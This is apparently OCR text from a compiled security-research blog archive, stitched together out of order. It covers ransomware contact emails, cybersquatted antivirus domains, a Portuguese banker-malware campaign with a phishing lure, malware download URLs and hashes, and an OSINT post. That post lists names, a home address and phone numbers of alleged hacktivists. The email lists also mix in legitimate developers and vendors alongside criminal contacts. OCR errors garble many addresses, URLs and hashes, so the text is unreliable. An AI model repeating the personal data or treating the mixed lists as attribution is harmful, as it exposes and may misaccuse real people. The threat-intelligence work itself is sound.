robocript@india.com 
robocript@gmx.us 
robocript@protonmail.ch 
Panzergen552@gmx.de 
Panzergen552@protonmail.com 
Panzergen552@india.com 
vendetta553@gmx.de 
vendetta553@india.com 
vendetta553@protonmail.com 
Filegorillal388@gmx.de 
Filegorillal388@india.com 
Filegorillal388@protonmail.com 
vine77725@gmx.de 
vine77725@india.com 
vine77725@protonmail.com 
panda7499@gmx.de 
panda7499@india.com 
panda7499@protonmail.com 
jonskuper578@india.com 
jonskuper578@gmx.de 
jonskuper578@protonmail.com 
fox2278@india.com 
fox2278@protonmail.com 
fox2278@gmx.de 
lion7872@protonmail.com 
lion7872@gmx.de 
lion7872@india.com 
Tizer78224@gmx.de 
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panda-suite.com 
pandaantivirus-2007.com 
pandaantivirus-2008.com 
pandaantivirus-ib.com 
pandaantivirus2008.com 
pandasecurity2008.com 
pandashield.com 
pandasuite2007.com 
panda-bundle.com 
pandabundle.com 
pandasecuritysoftware.com 
pandasecuritysoftware.net 
McAfee - 

mcafeepack.com 
download-mcafee.com 
mcafeebundle.com 
mcafee-antivirus-2007.com 
mcafee-internetsecurity.com 
mcafee-suite.com 
mcafee-suite2007.com 
mcafeeantivirus2007.com 
mcafeesuite-2007.com 
mcafeesuite2007.com 
Adobe Acrobat - 
adobeacrobatreader-8.com 
adobe-reader-it.com 
acrobatdownload-ib.com 
adobeacrobatpack.com 
acrobat8download.com 
Misc Cybersquatted software - 
virusscan2007.com 
virusscan2k7.com 
virusscan2k8.com 
virusscanxp.com 


xp-secure.com 
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Tizer78224@india.com 
Tizer77234@protonmail.com 
filesreturn247@gmx.de 
filesreturn247@india.com 
filesreturn247@protonmail.com 
shieldO@usa.com 
3048664056@qq.com 
patrik.swize@gmx.de 
slanler111@protonmail.com 
help244@ya.ru 
locker@bitmessage.ch 
infokey24@india.com 
a.rashepkin@gmail.com 
lucaS12@mail.ru 
fromriga@yahoo.com 
darren.griffin@live.co.uk 
fascom04@mail.ru 
maslovagoluba65@gmail.com 
kaz3162@ya.ru 
romanko.a@gmail.com 
betmenbar@gmail.com 
akorulin@gmail.com 
jo-l@yandex.ru 
3270604@gmail.com 
stancellove@yandex.ru 
aesklim@gmail.com 
zapravkagomel@gmail.com 
k.oltynaeva@rambler.ru 
dk.sumy@gmail.com 
3axapka@gmail.com 
6761994@mail.ru 
pye944@gmail.com 

ui _aleksey@mail.ru 
jawaclub777@rambler.ru 


nikolasautumn@gmail.com 
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Volosi87@gmail.com 
alfasoft@ex.ua 
yarkaya05@gmail.com 
kato50@mail.ru 
vOvanidze@mail.ru 
mrbin775@gmx.de 
mrbin775@protonmail.com 
decryptmystuff@protonmail.com 
lioghaly@india.com 
kfrvokr@protonmail.ch 
vapeefiles@aol.com 
infocrypt@india.com 
helper@bitmessage.ch 
BM-2cX2s3Zoqw9JFcC9QELpPPPmuKBGRQqF7pL7@bitmessage.ch 
lalabitch2017@yandex.com 
filesrestore@tutanota.com 
wowsmith123456@posteo.net 
muhendis@mail.ua 
muhends@mail.ua 
decr@cock.li 

decrsup@cock.li 
payoff@cock.li 
payoff@bigmir.net 
chines34@protonmail.ch 
oceannew _vb@protonmail.com 
garryhelpyou@qq.com 
garrymagic@tutanota.com 
gladius rectus@aol.com 
gladius rectus@india.com 
universe1@protonmail.ch 
universe11@bigmir.net 
payfordecrypt@qq.com 
crypthelp@qq.com 
black.world@tuta.io 


darkwaiderr@tutanota.com 
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darkwaiderr@gmx.de 
decrypt24@protonmail.com 
asdqwer123@cock.li 
assistance@firemail.cc 
goldwave@india.com 
blackworld@cock.li 
fidel_romposo@aol.com 
StormRansomware@gmail.com 
ms.heisenberg@aol.com 
Wecanhelp@protonmail.com 
XXXXXXX @XXXX.XXX 
onion33544@india.com 
redboot@memeware.net 
decryptorx@cock.li 
fuck4u@cock.li 
irmagetstein@india.com 
Jackie7@asia.com 
Jchan@india.com 
hyakunoonigayoru@yahoo.co.jp 
B32588601@163.com 
TheYuCheng@yeah.net 
BaYuCheng@yeah.net 
zip@email.tg 
contactfileszip@email.tg 
contato.arquivoszip@email.tg 
contatoarquivoszip@private-mail.com 
OttoZimmerman@protonmail.ch 
job2019@tutanota.com 

bad boy700@aol.com 
cadillac.407@aol.com 

Everest 2010@aol.com 
raphaeldupon@aol.com 

paper planel@aol.com 
barcelona _100@aol.com 


elizabethz7culjones@aol.com 
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beltoro905073@aol.com 
gomer simpson2@aol.com 
ofizducwelll988@aol.com 
FobosAmerika@protonmail.ch 
phobos helper@xmpp.jp 
phobos _helper@exploit.im 
phobos.encrypt@qq.com 
pixell@tutanota.com 
elizabeth67bysthompson@aol.com 
pixell@cock.li 
tlalipidas1978@aol.com 
cercisoril979@aol.com 
posiccimen1982@aol.com 
prejimzalma1972@aol.com 
taverptintral985@aol.com 
withdirimugh1982@aol.com 
hidebak@protonmail.com 
stanodexnel1982@aol.com 
waitheisenberg@xmpp.jp 
tedmundboardus@aol.com 
tylecotebenji@aol.com 
phobos helpper@xmpp.jp 
decryptfiles@420blaze.it 
decryptfiles@cock.lu 
absonkaine@aol.com 
klemens.stobe@aol.com 
autrey.b@aol.com 
alphonsepercy@aol.com 
park.jehu@aol.com 
kylenoble726@aol.com 
phobosrecovery@cock.|i 
phobosrecovery@tutanota.com 
darillkay@aol.com 

abbott wearing@aol.com 
thorpe.grand@aol.com 
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luciolussenhoff@aol.com 
grattan.|@aol.com 
costellon@aol.com 
carmichael.lion@aol.com 
returnmefiles@aol.com 
night _illusion@aol.com 
cello _dodds@aol.com 
hickeyblair@aol.com 
com-gloria@tutanota.com 
com-gloria@protonmail.com 
nichols I@aol.com 
fileo@protonmail.com 
back7@protonmail.ch 
keyO7@qq.com 
kew07@qq.com 
helpyourdata@qq.com 
ramsey _frederick@aol.com 
lofutesdogg1983@aol.com 
karlosdecrypt@outlook.com 
gabbiemciveen@aol.com 
christosblee@aol.com 
randal _inman@aol.com 
gherardobaxter@aol.com 
upfileme@protonmail.com 
DonovantTudor@aol.com 
simonsbarth@aol.com 
thedecrypt111@qq.com 
walletwix@aol.com 
ban.out@foxmail.com 
datadecryption@countermail.com 
leeming.derick@aol.com 
helpteam38@protonmail.com 
danger@countermail.com 
William _Kidd _2019@protonmail.com 


wewillhelpyou@qq.com 
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walletdata@hotmail.com 
hartpole.danie@aol.com 
lockhelp@qq.com 
lockhelp@xmpp.jp 
batecaddric@aol.com 
burnofin@hotmail.com 
cleverhorse@protonmail.com 
greg.philipson@aol.com 
hadleeshelton@aol.com 
fileisafe@tuta.io 
Keta990@protonmail.com 
The777@tuta.io 
supportcrypt2019@cock.li 
supportcrypt2019@protonmail.com 
zoyel596@msgden.net 
zoye596@protonmail.com 
b.morningtonjones@aol.com 
dennet.smellie@aol.com 
Quantroei@protonmail.com 
sailormorgan@protonmail.com 
irvinclarke@aol.com 
crysall.g@aol.com 
raynorzlol@tutanota.com 
raynorzlol@protonmail.com 
raynorzlol@thesecure.biz 
2172998725@qq.com 
friends2019@protonmail.com 
lachneyorlachb@aol.com 
worldofdonkeys@protonmail.com 
worldofdonkeys@xmpp.jp 
beautydonkey@xmpp.jp 
larabita@cock.li 

member987 @tutanota.com 
member987 @cock.|i 


tirrelllipps@aol.com 
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back _ins@protonmail.ch 
plombiren@qq.com 
bbbitcrypt@tutanota.com 
bbitcrypt@protonmail.com 
decrypt@files.mn 
limboshuran@cock.li 
repairfiles@foxmail.com 
files2@protonmail.com 
zax444@qq.com 
zax4444@qq.com 
recovermyfiles2019@thesecure.biz 
horsesecret@xmpp.jp 
kalle.tomlin@aol.com 
tirrellipps@aol.com 
captainpilot@cock.li 
onlyfiles@aol.com 
britt.looper@aol.com 
stuart.wittie@aol.com 
DatarestOre@aol.com 
decriptionsupport911@airmail.cc 
washapen@cock.|i 
restorebackup@qq.com 
veritablebee@protonmail.ch 
viadolorosa@tuta.io 
funnyredfox@aol.com 
lewisswaffield.a@aol.com 
XXXNXXxX@cock.| 
hanesworth.fabian@aol.com 
ciaprepoulep1977@aol.com 
bowen.bord@aol.com 
recoveryfast@airmail.cc 
painplain98@protonmail.com 
patern32@protonmail.com 
Unlockfiles@qq.com 
checkcheck07@qq.com 
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kickclakus@protonmail.com 
kickclak@cock.li 
relvirosal981@aol.com 
cleverhorse@ctemplar.com 
cleverhorse@xmpp.jp 
theonlyoption@qq.com 
debourbonvincenz@aol.com 
cosmecollings@aol.com 
phobos healper@xmpp.jp 
stocklock@airmail.cc 
restoringbackup@airmail.cc 
berne.fiddell@aol.com 
gruzudo@cock.li 

harlin marten@aol.com 
octopusdoc@mail.ee 
octopusdoc@airmail.cc 
agent5305@firemail.cc 
decrypt2020@aol.com 
kenny.sarginson@aol.com 
francispilmoor@aol.com 
keysfordecryption@airmail.cc 
keysfordecryption@jabb3r.org 
Admincrypt@protonmail.com 
prndssdnrp@mail.fr 
bexonvelia@aol.com 
maitlandtiffaney@aol.com 
topot@cock.li 
decryptfiles@qq.com 
decryptfiles@hot-chilli.eu 
decrypt4data@protonmail.com 
lucky _top@protonmail.com 
apoyo2019@protonmail.com 
saveyourfiles@qq.com 
paybtc@sj.ms 
jabberpaybtc@sj.ms 
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ofizducwe111988@aol.com 
kabennalzly@aol.com 
flexney.pail@aol.com 
anamciveen@aol.com 
dominga.k@aol.com 
chagenak@airmail.cc 
mr.helper@qq.com 
kokux@tutanota.com 
decrypt here@xmpp.jp 
mr.helper@jabb3r.de 
decrypt here@xrnpp.jp 
jewkeswilmer@aol.com 
squadhack@email.tg 
online24decrypt@airmail.cc 
danianci@airmail.cc 
youcanwrite24h@airmail.cc 
patiscaje@airmail.cc 
helprecover@foxmail.com 
recoverhelp2020@thesecure. biz 
sverdlink@aol.com 

dessert guimauve@aol.com 
2183313275@qq.com 
werichbin@protonmail.com 
werichbin@cock.li 

wang team777@aol.com 
wang team999@aol.com 
cynthia-it@protonmail.com 
leonardo@cock.lu 
backup.iso@aol.com 
deltatechit@protonmail.com 
deltatech@tuta.io 
mccreight.ellery@tutanota.com 
2020x0@protonmail.com 
2020x@cock.|lu 


verious1@cock.|i 
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filesreturn@cock.li 
decphob@tuta.io 
decphob@protonmail.com 
mecybaki@firemail.cc 
naqohiky@firemail.cc 
ezequielanthon@aol.com 
robinhood@countermail.com 
eccentric _inventor@aol.com 
noyes.brice@aol.com 
MerlinWebster@aol.com 
sookie.stackhouse@gmx.com 
chinadecrypt@fasthelpassia.com 
savemyselfl@tutanota.com 
crioso@protonmail.com 
wiruxa@airmail.cc 
yongloun@tutanota.com 
anygrishevich@yandex.ru 
SimpleSup@cock.li 
DavidsHelper@protonmail.com 
SimpleSup@tutanota.com 
subikO99@tutanota.com 
Helpforfiles@xmpp.es 
qirapoo@firemail.cc 
dozusopo@tutanota.com 
spacexhuman@tutanota.com 
spacexhuman@protonmail.com 
spacexhuman@jabb.im 
bernard.bunyan@aol.com 
saveisos@aol.com 
devos@countermail.com 
files@restore.ws 
unlockfile@firemail.cc 
kxxe@airmail.cc 
guxehys@mailfence.com 
sparem@kolabnow.com 
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netdetectiveservices.info 
download-ad-aware.com 
antispyware-2007.com 
antivirus-2007.com 
netspyprotector.com 
adwarepro.com 
antispyware007.com 
anti-virus-free.net 
antivirus2k7.com 
antivirus2k8.com 
avastantivirus-pro.com 
avg-antivirus-ib.com 
What is Interactive Brands Inc? 


"Interactive Brands is a privately held corporation formed by a team of experienced profes- 
sionals who strive to offer the “ultimate” interactive shopping experience to internet users 
around the world. In partnership with the best software publishers, Interactive Brands devel- 
ops unique and high value offers for the benefit of all computer users. In the spirit of giving 
the best shopping experience possible, Interactive Brands offers their clients access to a Cus- 
tomer support center available by toll free number, email and live chat that covers any inquiry 
including: downloading, installing, using and any other questions regarding our products." 


Interactive Brands Inc. 

PO Box 178, St-Laurent, Quebec 
H4L 4V5, Canada 

Phone: : +1 (514) 733-2549 
Fax: +1 514 733 2533 


The billing center is located at panda-ib.com which loads b-softwares.com and bundlesmem- 
bersarea.com. 90 % of the domains are hosted on a single IP - 63.243.188.82, however, the 
entire netblock is a scammy system by itself with several hundred more such cybersquatted 
domains. 


Don’t be cheap, if you’re to buy any kind of software, do so through the official site, and cut 
the fraudulent intermediaries like the ones in this case. Read more about Interactive Brands 
at the Ripoff Report : [6]Interactive Brands, Adaware-ib.com Rip-off; [7]Report: Interactive 
Brands; [8]Report: Interactive Brands. [9]Lavasoft’s and [10]Avira’s comments on the case as 
well. 


1, fttip://Adanchev. blogspot. con/2007/i1/ state-of typosquatt ing-2007 hal 
2. http: //ddanchev blogspot . com/2007/09/paypal-and-ebay-phishing-domains html 
3, http://en. wikipedia. org/viki /Cybersquatting 

4, http://pandalabe. pandasecurity com/ 

5, htep://wiv.avertlabe..con/research/blog/ 
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wmanxtere@privatemail.com 
raypas@goat.si 
eddyayman@gmail.com 
asdqzx51@gmail.com 
maxicrypt@cock.li 
maxidecrypt@protonmail.com 
nullforwarding@qualityservice.com 
m4zm0v@keemail.me 
JeanRenoAParis@protonmail.com 
Leviathan13@protonmail.com 
gentilpascal@bitmessage.ch 
brian.r.goodwin@protonmail.com 
imBoristheBlade@protonmail.com 
gomer@horsefucker.org 
gomersimpson@keemail.me 
johnsonwhate@protonmail.com 
johnsonwhate@tutanota.com 
A654763764@qq.com 
decrypter02@cumallover.me 
piterpben02@keemail.me 
jimmtheworm@dicksinmyan.us 
newrecoverybot@pm.me 
sqlbackup3@mail.fr 
doctor666@mail.fr 
newrecoveryrobot@pm.me 
doctor666@cock.li 
repairdb@seznam.cz 
repairdb@mail.fr 
decryptor911@airmail.cc 
decryptor666@420blaze.it 
doctor777@mail.fr 
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4.3.16 A Localized Bankers Malware Campaign (2008-03-25 17:23) 


ad Windows Live 

Ola usuario, informamos que no dia 24 de Marco de 2008, a Equipe Hotmail alterou o conteddo 
dos “Termos e Condic6es de uso" e por isso tem a obrigac3o de comunicar este fato a todos os 
usuarios que utilizar frequentemente seu be Windows Live ID. 

Seu a Windows Live ID esta associado a sua conta Hotmail.com, caso n3o aceite os 

novos "“Termos e Condicées de uso" podera perder sua conta, (Porque posso perder minha conta’ 
Li e aceito os termos e condic6es de uso N3o aceito os termos e condicées de uso 
Atenciosamente, 


Equipe Hotmail 


Originalmente enviada em: 03/10/2007 4s 08:20 


Just like the [1]Targeted Spamming of Bankers Malware campaign that | exposed in November 
2007, in this post I'll assess another targeted, but also localized to Portuguese campaign 
with a decent degree of cyber deception applied. It appears that the latest round has been 
spammed two days ago, but expanding their ecosystem reveals evidence of more bankers 
malware on behalf of the same malicious parties. What’s particularly interesting about this 
campaign, is that they’re using a hardcoded list of already breached email accounts of mostly 
Brazilian users, and using it as a foundation for the distribution of the malware under the 
clean IP reputation - which explains why the email makes it through anti-spam filters. The 
message impersonating Hotmail could have been easily outsourced as a translation process, 
as I’ve already pointed out in a previous post emphasizing on [2]Jacquiring cultural diversity on 
demand for malicious malware, spam and phishing purposes. However, in this case it’s more 
important to emphasize on [3]the targeted nature of the campaign, and the use of a Russian 
free web space provider as a hosting provider for the malware. 
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elpdatarestore@firemail.cc 
dongeswas@tutanota.co 
wlojul@secmail.pro 
ffgghtdfg@cock.li 
btcdecripter@qq.com 
Corpseworm@protonmail.com 
Salesrestoresoftware@gmail.co 
johnwright.fbi.gov@yandex.com 
stritinge@gmail.com 
grandums@gmail.com 
starbax@tutanota.com 
trees.jpg.bepabepababy1@protonmail.com 
yuzhou13@tutanota.com 
twist@airmail.cc 
MasterLuBu@tutanota.com 
symmetries@tutamail.com 
bucheck@protonmail.com 
Noreply@security.biz 
DataBack@qbmail.biz 
Fullrestore@qq.com 
1024back@tuta.io 
Ixhlp@protonmail.com 

how _decrypt@aol.com 
decrypt2021@aol.com 
HappyNewYear2021@tutanota.com 
admin@stex777.com 
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Now on the cyber deception issue. Basically, you have a malware campaign targeting 
Portuguese speaking end users, that’s been emailed using Brazilian mail servers through a 
set of hardcoded and already breached local email acounts, it’s serving fake bank logins of a 
Portuguese bank, whereas the malicious parties are using a Russian free web space provider, 
front.ru in this case as a reliable and outsourced approach to host the malware malware. Is 
this an example of the [4]maturing consolidation betweeen spammers, phishers and malware 
authors, or is someone trying to [5Jengineer cyber crime tensions? I’d go for the second, the 
command and control of this banker malware is hiding behind a fake image file, and is all in 
Portuguese, the way the emails where the stolen information or notifications per infection 
are descripted in Portuguese. Moreover, within several of the subdomains hosted at front.ru, 
there’re also pages pushing bankers malware through a fake Apaixonado Big Brother Brazil 
2008 pages. So you have a South American malicious party generating noise on behalf 
of Russia’s overall bad reputation in respect to malware. Here are more details from this 
campaign : 
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nhelpmanager@firemail.cc 
nhelpmanager@iran.ir 
nstopfilesrestore@bitmessage.ch 
nstopfilesrestore@india.com 
Who8@mail.fr 
decryptdocs@protonmail.com 
ask@unboxhow.com 
metasploit@post.com 
getacrypt@tuta.io 

21btc@cock.li 
username@gmail.com 
VirtualMaidRansomwareOpencode@india.com 
virusremovalg@gmail.com 
u00a0virusremovalg@gmail.com 
ilya.shabanov@anti-malware.ru 
olejah@virusinfo.info 
thyrex2002@tut.by 
webmaster@2-remove-virus.com 
fessleak@qip.ru 
johncastle@msgsafe.io 
cryptlive@aol.com 
Kromber@tutanota.com 
Unlock11@protonmail.com 
no-reply@gmail.com 
amangus@india.com 
mcerdem82@yahoo.com 
notgoodnews@tutanota.com 
paymenttoday@firemail.cc 
leeza@keemail.me 
reddragon3335799@protonmail.ch 
Cobra Locker@protonmail.com 
Help-Mails@Ya.ru 

alexous@bk.ru 
contatoaac@vpn.tg 
Redman333@bigmir.net 
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bbqb@protonmail.com 
r.protonmolecule@gmx.us 
zdpm1975@gmail.com 
coronaVi2022@protonmail.ch 
coronavi2022@protonmall.ch 
support@enigmasoftware.com 
gdpr@enigmasoftware.com 
Avaaddams@msgsafe.io 
Freaker@msgsafe.io 
howdecrypt@aol.com 
rob.groves@btinternet.com 
daniel@haxx.se 
openssl-core@openssl.org 
jloup@gzip.org 
madler@alumni.caltech.edu 
giuseppe@iuculano. it 
hpa@zytor.com 
srivasta@debian.org 
sds@epoch.ncsc.mil 
d.paleino@gmail.com 
mjg59@srcf.ucam.org 
noodles@earth. |i 
gandalf@le-vert.net 
djwong@us.ibm.com 
simshawj@us.iobm.com 
bikko@us.iobm.com 
sos@FreeBSD.org 


stopfilesrestoret@bitmessage.ch 


ordersupport@mycommerce.com 


ordersupport.ja@mycommerce.com 


ordersupport.es@mycommerce.com 


ordersupport.pt@mycommerce.com 


ordersupport.it@mycommerce.com 


ordersupport.de@mycommerce.com 


ordersupport.fr@mycommerce.com 
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ordersupport.nl@mycommerce.com 
ordersupport.cn@mycommerce.com 
ordersupport.zh@mycommerce.com 
volcano666@tutanota.de 
support@hbwsl.com 

back data@foxmail.com 
helpOfOryOu@protonmail.com 
customerservice@safecart.com 
support@safecart.com 
shopper@esellerate.net 

mark _white@mail.ua 
carlosrestore2020@aol.com 
Paradise@all-ransomware.info 
2katrin@tuta.io 

smithhelp@mail.ee 
billwong73@yahoo.com 
billwong73@protonmail.com 
billwong73@aol.com 
anna.kurtz@protonmail.com 
newpatek@cock.li 
onmywrist@cock.|i 

crown desh@aol.com 
kryzikrut@airmail.cc 
gabriele.keeler@aol.com 
pennmargery@aol.com 
walmesleyemerita@aol.com 
Jamees0101@outlook.com 
decryptfiles@countermail.com 
decryptioner@airmail.cc 
savemyfiles@protonmail.com 
hjelp.main@protonmail.com 
ambulance@keemail.me 
flopored@protonmail.com 
villiamsscorj rembly@protonmail.com 


qbix@qq.com 
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coronavirus@qq.com 
decrypt@qbmail.biz 
Adamfox69@criptext.com 
Adamfox69@aol.com 
Adamfox69@tutanota.com 
tru888@qq.com 
tru8@protonmail.com 
tru8@tutanota.com 
Irkxayumi@yandex.com 
edwardgwozniak@protonmail.com 
nicholaslopez1975@tutanota.com 
harrietgoodman21@tutanota.com 
22btcdams@msgsafe.io 
22btc@tuta.io 

jc _finley@yahoo.com 
millenisO00@qq.com 
Usacrypt@aol.com 
Helpsok@cock.|i 
admin@sectex.net 
whitwellparke@aol.com 
taargo@olszyn.com 
akzhq808@tutanota.com 
biashabtc@redchan. it 
garantos@mailfence.com 
Pexdatax@gmail.com 
VirusPexdatax@gmail.com 
axitrun2@tutanota.com 
greatideacompany@gmail.com 
Admin@spacedatas.com 
Nmode@tutanota.com 
ransOme@protonmail.com 
-decphob@tuta.io 
nochange@tuta.io 
mr.yoba@aol.com 
hernansec@protonmail.ch 
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mr.lpcap@aol.com 
submit@securitystronghold.com 
support@sweetim.com 
MAILER-DAEMON@nm30.bullet.mail.sp2.yahoo.com 
seaton.mctavish@yahoo.com 
653905.79556.bm@omp1052.mail.sp2.yahoo.com 
elektricnut@bigpond.com 
careers@incat.com.au 

no _reply@careerone.com.au 
mapenterprises@live.com.au 
whawksworph@skilled.com.au 
nico.smit@bigpond.com 
jmekina@mekinatechnologies.com 
stella.star@telkomsa.net 
seazosurf@yahoo.com 
penkatyjamie@yahoo.com 
auPlombiren@hotmail.com 
rkmr121@rediffmail.com 
ravenheim@hotmail.com 
meme71973@hotmail.com 
mundus@newmail.dk 
siongkin@hotmail.com 
kandagatla_sandeep@yahoo.in 
san _goko@yahoo.com 

sasuke of the uchiha@hotmail.com 
veritasgeek@yahoo.com 
hipandahr@protonmail.ch 
matrixBTC@keemail.me 

vassageo 0203@tutanota.com 
guardbtc@cock.|i 

Tors@tuta.io 

mr _chack33@india.com 
maykolinl234@aol.com 
Darknes@420blaze.it 
mpa9698@live.com 
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BigBobRoss@computer4u.com 
bellevueinject@openmailbox.org 
nostrol9@protonmail.com 
garrantydecrypt@airmail.cc 
cryptohitman@yandex.com 
criptote@hmamail.com 
referas@hmamail.com 
terder@hmamail.com 
utera@hmamail.com 
criptotak@hmamail.com 
umbredecrypt@engineer.com 
umbrehelp@consultant.com 
contacts.spywaretechs@gmail.com 
vm1liqzi@aol.com 
paymei@cock.|i 
hipanda@keemail.me 
hipandahi@protonmail.ch 
paracrypt@cock.|i 
p4r4l0Ock@tutanota.com 
legalrestore@airmail.cc 
host2021@tutanota.com 
hackcore55@gmail.com 
troll22118@gmail.com 
twovm1iqzi@aol.com 
paymei@tuta.io 
restorealldata@firemail.cc 
gorentos@bitmessage.ch 
masterlrestore@cock.li 
gubarlesless@cock.li 
webmaster@pcthreat.com 
blackingdom@gszmail.com 
insupport@messagesafe.io 
helpmanager@mail.ch 
restoremanager@airmail.cc 
admin@stelsdatas.com 
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Lhelpman@inboxhub.net 
Okean-1955@india.com 
Bitcoinrush@imail.com 
Seven _legion@aol.com 
Happydayz@india.com 
Mespinoza980@protonmail.com 
noreply@blogger.com 

Last centurion@aol.com 
Thedon78@mail.com 
Sitaram108@india.com 
helpteam@mail.ch 
helpmanager@airmail.cc 
btcl11@gmx.com 
sorysorysory@cock.li 
con3003@msgsafe.io 
vassago 0203@tutanota.com 
vassago0203@cock.|i 
hemant.frnz@gmail.com 
Diablo diablo2@aol.com 
Helpme@freespeechmail.org 
helpmanager@firemail.cc 
helpmanager@iran.ir 
toddmhickey@outlook.com 
admin@bugsfighter.com 
service@paypal.com 
tcprx@tutanota.de 
varasto@firemail.cc 

Leif Borer30@gmail.com 
rico@ricostacruz.com 
manager@securitystronghold.com 
restoremanager@firemail.cc 


Stay tuned! 


1. https://1.bp.blogspot.com/-saBfda3Iv50/YCugU3pkWXI/AAAAAAAALW8/qj1bUsreQqIRm9nU09QWFU3LotmfRSaJ1QCLcBGASYHQ 
s970/Misc_01.png 


2. https: //ddanchev. blogspot .com/2020/09/profiling-currently-active-high-profile.htm 


3. https://ddanchev. blogspot .com/2020/11/exposing-protonmail-and-tutanotas.htm 
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17.2.8 Exposing Anonymous International’s Hacking Collective Online Infrastructure 
- An OSINT Analysis (2021-02-18 13:25) 


Dear blog readers, 


It’s been a while since I’ve last posted a quality update and I’ve decided to elaborate more and 
offer an in-depth analysis of Anonymous International’s Hacking Collective online infrastructure 
with the idea to assist U.S Law Enforcement and the security industry on its way to properly 
track down and attempt to shut down the infrastructure behind their fraudulent and rogue 
online infrastructure. 


In this post I'll provide actionable intelligence on Anonymous International’s Hacking Collec- 
tive online infrastructure and discuss in-depth the tactics techniques and procedures of the 
cybercriminals behind it and offer an in-depth peek inside Anonymous Indonesia a.k.a SoraCy- 
berTeam. 


Sample personally identifiable information for members of Anonymous International’s Collec- 
tive Indonesia: 


Name: Cyb3r00T 


Personally identifiable information: Email: cyb3r00t.linux@gmail.com; 
SoraCyberlTeam@gmail.com including the following Facebook account 
(https://www.facebook.com/Cyb3r00T.go.id) including the following GitHub ac- 
count (https://github.com/soracyberteam) including the _ following YouTube - ac- 
count (https://www.youtube.com/cyb3r00t) including the _ followinfg Twitter account 
(https://twitter.com/soracyberteam) 


Personal Email: soracyberteam@gmail.com 
Security Cyber Art 
https://www.facebook.com/Cyb3r00t 

Team members of the group include: Tatsumi Crew 


RESIS-07 - ./Cyb3ROOT - AaR999 - Setya404 - ACE666x - B4Dsec - Mr.Adewa - Weak System - 
Kerens.id - Dayy404 ON3R1D3R - Rhythm - xLon3ly - P4kLOnc4t - Azrael - SPEEDY-03 - Rhythm 
- Mr.Swan - Yukiteru404 - xLon3ly - P4kLOnc4t - Jakarta6etar 


Personal Address: Jalan Melati 77 Timur Tengah, Kabupaten Gunung Kidul , DI Yogyakarta, 
77777 


Personal Phone: 087839992377; 6289669511216 
Personal Web Site: https://cyb3r00t.chatango.com 
Personal Web Sites: 

https://www.anonnewsid.cf 
https://twitter.com/anonnewsindo 
https://twitter.com/anon _indonesia 
https://www.facebook.com/anon.indonesial1/ 


Sample Personal Photos of members of Anonymous International’s Hacking Collective Indone- 
sia: 
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Date Risk Origin Findings 


3/25/2008 1:11:38 PM ll @& Trojan-Downloader,. Win32.Banload.bej, PWS-Banker, Possible_Virus.. 

3/25/2008 8:32:08 AM ttl Downloader.Bancos, Trojan. Generic 

3/3/2008 6:48:18 PM well & Downloader, Downloader. gen.a, TROJ_DLOADER. RWW 

2/28/2008 11:44:26 AM wll @ Trojan-Downloader. Win32.Banload.bej, PWS-Banker, Possible_Virus 

2/27/2008 7:04:10 PM wll BS Trojan-Downloader. Win32.Banload.rr, Downloader, Downloader-ABU, Possible_Virus.. 
2/1/2008 6:56:20 PM wall [S| Trojan-Downloader. Win32.Banload.bej, PWS-Banker, TROJ_BANLOAD.BE) 
1/11/2008 9:41:25 Pm || io] Packed/nPack, Trojan-Downloader. Win32.Banload.bej, New Malware.eb 

1/8/2008 3:42:12 AM atl Trojan-Spy. DelfisdS, Trojan-Spy. Win32.Delf.rz, Trojan.Braban, Downloader-ABU 
12/25/2007 7:56:23 AM wall S Trojan-Downloader. Win32.Banload.bej, Possible_Virus, Infostealer 

12/24/2007 12:51:36 AM sal | Possible_Virus 

12/21/2007 4:12:48 PM ll BS Trojan-Downloader. Win32.Banload.fgy, Possible_Virus 

12/21/2007 9:47:02 AM wll B Trojan-Downloader. Win32.B8anload.bej, Downloader, PWS-Banker.didr.. 
12/21/2007 9:41:33 AM well S&S Packed/nPack, Trojan-Downloader. Win32.Banload.bej, Downloader, PWS-Banker.. 
12/17/2007 4:36:46 PM all Trojan-Downloader. Win32.Banload.erp 

12/17/2007 11:34:46 AM = can io Trojan-Downloader. Win32. Delf. acc, Downloader.Bancos, TROJ_DELF.GBN.. 
12/15/2007 7:17:33 AM «th Trojan-Downloader. Win32.Banload.erp 

12/11/2007 10:18:20 AM = cea @& Trojan-Downloader. Win32.Banload.erp 

12/9/2007 9:56:37 AM all & Trojan-Downloader. Win32.Banload.erp 

12/5/2007 10:17:46 AM all S&S Trojan-Downloader. Win32. Delf. acc, Downloader.Bancos, TROJ_DELF.GBN.. 


Subject: Cancelamento de E-Mail 

Message: "Ola usuario, informamos que no dia 24 de Marco de 2008, a Equipe Hotmail alterou 
o conteudo dos "Termos e Condicoes de uso" e por isso tem a obrigacao de comunicar este 
fato a todos os usuarios que utilizam frequentemente seu Windows Live ID. Seu Windows Live 
ID esta associado a sua conta Hotmail.com, caso nao aceite os novos "Termos e Condicoes de 
uso" podera perder sua conta. (Porque posso perder minha conta?) Li e aceito os termos e 
condicoes de uso Nao aceito os termos e condicoes de uso Atenciosamente, Equipe Hotmail" 
Sent from: knight.bs2.com.br 

Banker location: suport022.front.ru/flashcard/ list.exe 


Scanners Result: 13/32 (40.62 %) 

TR/Spy.Banker.Gen; Trojan-Spy.Win32.Banker.JU 

File size: 3339776 bytes 

MD5: e00b1cd654b5b3fd5c8al1f5e71939a04 

SHA1: cc11a030e868ece65769e177616cbebfb239bee6 


It’s also interesting to note that this campaign’s been aiming to stay beneath the radar, 
not just by localizing the campaign itself and distributing the malware in a targeted nature, 
but by using a minimalistic spamming practices as you can see in the screenshot indicating a 
modest binary change in between three days or so. However, based on the identical mutex 
created by several different malware samples, and the free web space hosting provider used, 
| was able to locate more banker malwares created by the same malicious parties, again using 
front.ru as a hosting provider for more bankers malware under the following locations : 


www-orkut-compronfiles-aspxuids-.front.ru/ Ikjhgterri.com 
www-orkut-compronfiles-aspxuids-.front.ru/ plugins.com 
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[10] 
13737 


[11] 
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[12] 


[13] 


[14] 
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[15] 


[16] 


[17] 
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[20] 


[21] 
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www-orkut-compronfiles-aspxuids-.front.ru/ remote.com 
www-orkut-compronfiles-aspxuids-.front.ru/ pro.com 
www-orkut-compronfiles-aspxuids.front.ru 
www-orkut-comprofile-aspxuid.front.ru 
albumfotos.front.ru/ winupdate.exe 

gsnet.front.ru/ gm.exe 

informes2000.front.ru/ robin.exe 


The cute part is that the malicious parties behind it allow anyone to take a peek at the 
list of breached email accounts and the associated passwords due to the usual misconfigu- 
ration on their server, allowing me to come up with the C &Cs update locations, predefined 
message to be included within upcoming campaigns, and the email addresses used for internal 
purposes, like the following - 


